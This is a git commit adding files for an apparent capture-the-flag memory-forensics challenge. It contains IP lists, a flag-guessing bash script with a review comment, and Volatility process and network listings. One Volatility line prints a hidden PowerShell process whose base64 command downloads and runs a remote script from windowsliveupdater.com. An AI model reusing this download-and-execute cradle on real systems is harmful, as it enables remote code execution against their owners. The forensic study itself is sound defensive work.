add forensics

This commit is contained in:
2021-12-02 22:01:31 +01:00
parent f1db6a288e
commit b3014e4977
6 changed files with 346 additions and 0 deletions


@@ -0,0 +1,72 @@
0.0.0.0
0.0.0.0
10.0.2.15
93.184.220.29
10.0.2.15
172.67.177.22
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
10.0.2.15
147.182.172.189
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
127.0.0.1
0.0.0.0
0.0.0.0
10.0.2.15
212.205.126.106
10.0.2.15
204.79.197.203
10.0.2.15
95.100.210.141
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
10.0.2.15
172.67.177.22
10.0.2.15
95.100.210.141


@@ -0,0 +1,21 @@
#!/bin/bash
list=(
10.0.2.15
127.0.0.1
65.55.44.109
147.182.172.189
172.67.177.22
204.79.197.203
212.205.126.106
93.184.220.29
95.100.210.141
)
for ip in ${list[@]}; do
echo Generating Flag from $ip:
echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}"
echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}"
done
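Review bot: The flag printed by the last `echo` is not a bare digest: `md5sum` writes `<hash>  -` when reading stdin, so the substitution on that line produces `HTB{<hash>  -}` and the trailing two characters would have to be stripped before the string is usable as a candidate. Capture the digest first and keep only the part before the first space, e.g. `hash=$(printf '%s' "https://windowsliveupdater.com/update.ps1_2700_$ip" | md5sum)` followed by `printf 'HTB{%s}\n' "${hash%% *}"`. The preceding `echo "HTB{echo -n "..."|md5sum}"` line only prints the literal expression because its inner double quotes close the outer string, so it looks like a leftover debug line and can be dropped. Quoting the loop list as `for ip in "${list[@]}"` and using `printf 'Generating flag from %s:\n' "$ip"` would also make the script ShellCheck-clean.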

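--- a/forensics/honeypot/test
+++ b/forensics/honeypot/test
@@ -0,0 +1,129 @@
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+65.55.44.109
+0.0.0.0
+0.0.0.0
+0.0.0.0
+10.0.2.15
+93.184.220.29
+10.0.2.15
+172.67.177.22
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+10.0.2.15
+0.0.0.0
+0.0.0.0
+10.0.2.15
+0.0.0.0
+10.0.2.15
+212.205.126.106
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+0.0.0.0
+10.0.2.15
+10.0.2.15
+147.182.172.189
+10.0.2.15
+212.205.126.106
+10.0.2.15
+212.205.126.106
+0.0.0.0
+0.0.0.0
+127.0.0.1
+0.0.0.0
+0.0.0.0
+10.0.2.15
+212.205.126.106
+10.0.2.15
+204.79.197.203
+10.0.2.15
+95.100.210.141
+10.0.2.15
+212.205.126.106
+10.0.2.15
+212.205.126.106
+10.0.2.15
+172.67.177.22
+10.0.2.15
+95.100.210.141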


@@ -0,0 +1,60 @@
Volatility 3 Framework 1.0.1
PID Process Args
4 System Required memory at 0x10 is not valid (process exited?)
236 smss.exe \SystemRoot\System32\smss.exe
308 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
348 wininit.exe wininit.exe
360 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
400 services.exe C:\Windows\system32\services.exe
408 lsass.exe C:\Windows\system32\lsass.exe
416 lsm.exe C:\Windows\system32\lsm.exe
496 winlogon.exe winlogon.exe
572 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch
636 VBoxService.ex C:\Windows\System32\VBoxService.exe
692 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS
744 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
848 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
888 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
1012 svchost.exe C:\Windows\system32\svchost.exe -k LocalService
1084 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService
1208 spoolsv.exe C:\Windows\System32\spoolsv.exe
1252 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1376 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Heartbeat
1396 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature KvpExchange
1432 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Shutdown
1440 taskhost.exe "taskhost.exe"
1504 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature TimeSync
1532 dwm.exe "C:\Windows\system32\Dwm.exe"
1540 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature VSS
1556 explorer.exe C:\Windows\Explorer.EXE
1620 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc
1716 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
1872 cygrunsrv.exe "C:\Program Files\OpenSSH\bin\cygrunsrv.exe"
1956 wlms.exe C:\Windows\system32\wlms\wlms.exe
1612 cygrunsrv.exe Required memory at 0x7ffd9010 is not valid (process exited?)
1684 conhost.exe \??\C:\Windows\system32\conhost.exe "-57088940168010838710243314093101560802089520680-1936804963-2081634044-598129742
1676 sshd.exe "C:\Program Files\OpenSSH\usr\sbin\sshd.exe"
1800 sppsvc.exe C:\Windows\system32\sppsvc.exe
2080 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
2360 SearchIndexer. C:\Windows\system32\SearchIndexer.exe /Embedding
2440 SearchProtocol "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
2460 SearchFilterHo "C:\Windows\system32\SearchFilterHost.exe" 0 504 508 516 65536 512
2616 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
2644 winlogon.exe winlogon.exe
2784 taskhost.exe "taskhost.exe"
2844 dwm.exe "C:\Windows\system32\Dwm.exe"
2856 explorer.exe C:\Windows\Explorer.EXE
3108 regsvr32.exe Required memory at 0x7ffd5010 is not valid (process exited?)
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


@@ -0,0 +1,62 @@
Volatility 3 Framework 1.0.1
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x23d04218 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x23d04218 TCPv6 :: 49155 :: 0 LISTENING 400 services.exe N/A
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e22f008 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e22f008 UDPv6 :: 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e238300 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System N/A
0x3e238300 TCPv6 :: 445 :: 0 LISTENING 4 System N/A
0x3e24c588 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e281368 UDPv4 10.0.2.15 138 * 0 4 System 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv4 0.0.0.0 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv6 :: 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a6448 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e2b5b88 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System N/A
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3e354618 UDPv6 fe80::256b:4013:4140:453f 546 * 0 744 svchost.exe 2021-11-25 19:12:31.000000
0x3e3b0c70 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e5e4f50 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5e4f50 UDPv6 :: 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5f77a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e619578 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
0x3e619578 TCPv6 :: 49152 :: 0 LISTENING 348 wininit.exe N/A
0x3e619cc0 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
0x3e630008 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630008 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630a20 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3e630a20 TCPv6 :: 49156 :: 0 LISTENING 408 lsass.exe N/A
0x3e648508 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e648508 TCPv6 :: 49153 :: 0 LISTENING 744 svchost.exe N/A
0x3e6b92c0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6b92c0 TCPv6 :: 135 :: 0 LISTENING 692 svchost.exe N/A
0x3e6b9910 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6f0bd8 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e75f8e0 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e762a40 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x3e7686e8 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e7686e8 TCPv6 :: 49154 :: 0 LISTENING 888 svchost.exe N/A
0x3e8611f0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e8611f0 TCPv6 :: 22 :: 0 LISTENING 1676 sshd.exe N/A
0x3e9be828 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3ed036c8 UDPv4 10.0.2.15 137 * 0 4 System 2021-11-25 19:12:23.000000
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f2cff50 UDPv4 0.0.0.0 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f2cff50 UDPv6 :: 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f4d7378 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f4dad28 UDPv4 127.0.0.1 58426 * 0 3344 iexplore.exe 2021-11-25 19:13:31.000000
0x3f520ab8 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f520ab8 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f546de8 UDPv4 0.0.0.0 0 * 0 636 VBoxService.ex 2021-11-25 19:14:14.000000
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -